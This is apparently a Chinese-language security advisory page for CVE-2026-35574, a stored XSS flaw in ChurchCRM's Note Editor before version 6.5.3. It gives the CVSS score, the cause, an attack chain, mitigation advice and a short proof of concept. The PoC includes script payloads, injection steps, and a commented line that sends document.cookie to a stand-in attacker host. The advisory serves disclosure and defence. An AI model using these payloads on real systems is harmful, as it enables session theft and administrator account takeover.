CVE-2026-35574 CVSS 7.3 高危

CVE-2026-35574 ChurchCRM存储型XSS漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35574

漏洞类型

存储型跨站脚本攻击

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源的教会管理系统。在6.5.3版本之前，其Note Editor组件存在存储型XSS漏洞。拥有添加笔记权限的认证用户可以利用该漏洞注入恶意JavaScript代码。当其他用户（包括管理员）查看被注入的笔记时，恶意代码将在其浏览器上下文中执行。攻击者可借此窃取会话令牌、提升权限或访问敏感的教会成员数据。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。漏洞成因在于ChurchCRM的Note Editor功能未能对用户输入的内容进行充分的过滤和转义，直接将其存储在数据库中。当具备笔记添加权限的攻击者通过编辑器输入特制的JavaScript payload（例如`<script>alert(document.cookie)</script>`）并提交后，该恶意脚本会被持久化保存。随后，当管理员或其他具有权限的用户访问包含该恶意笔记的页面时，服务器会从数据库读取未经过滤的内容并渲染到HTML页面中，导致浏览器执行攻击者注入的脚本。由于攻击发生在受害者的浏览器上下文中，攻击者可以利用DOM操作窃取Session Cookie、重定向到钓鱼网站或执行进一步的操作，从而接管受害者账户。

攻击链分析

STEP 1

侦察与获取权限

攻击者发现目标使用ChurchCRM系统，并获取一个具有添加笔记权限的低权限账户。

STEP 2

注入Payload

攻击者登录系统，在Note Editor中输入包含恶意JavaScript代码的内容并保存。

STEP 3

持久化存储

恶意代码被存储在ChurchCRM的数据库中，等待其他用户访问。

STEP 4

触发漏洞

当管理员或其他高权限用户访问包含恶意笔记的页面时，服务器从数据库读取数据并渲染，导致恶意脚本在受害者浏览器中执行。

STEP 5

达成攻击目标

恶意脚本窃取受害者的Session Cookie或执行其他操作，攻击者利用窃取的身份接管管理员账户，实现权限提升和数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for Stored XSS in ChurchCRM Note Editor -->
<!-- Payload to be injected into the Note Editor -->
<script>
  // Example payload to demonstrate execution context
  alert('CVE-2026-35574 Stored XSS Executed');
  
  // In a real attack, this could be:
  // fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

<!-- Usage Instructions: -->
<!-- 1. Log in to ChurchCRM with a user that has 'Add Note' permissions. -->
<!-- 2. Navigate to a person or family profile. -->
<!-- 3. Click 'Add Note'. -->
<!-- 4. Paste the script tag above into the note text area. -->
<!-- 5. Save the note. -->
<!-- 6. Wait for an Administrator to view the profile/note. -->

影响范围

ChurchCRM < 6.5.3

防御指南

临时缓解措施

建议立即将ChurchCRM系统升级至6.5.3或更高版本。若无法立即升级，应严格限制用户添加笔记的权限，并对提交的笔记内容进行严格的HTML标签过滤，移除<script>、onerror等危险字符和属性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表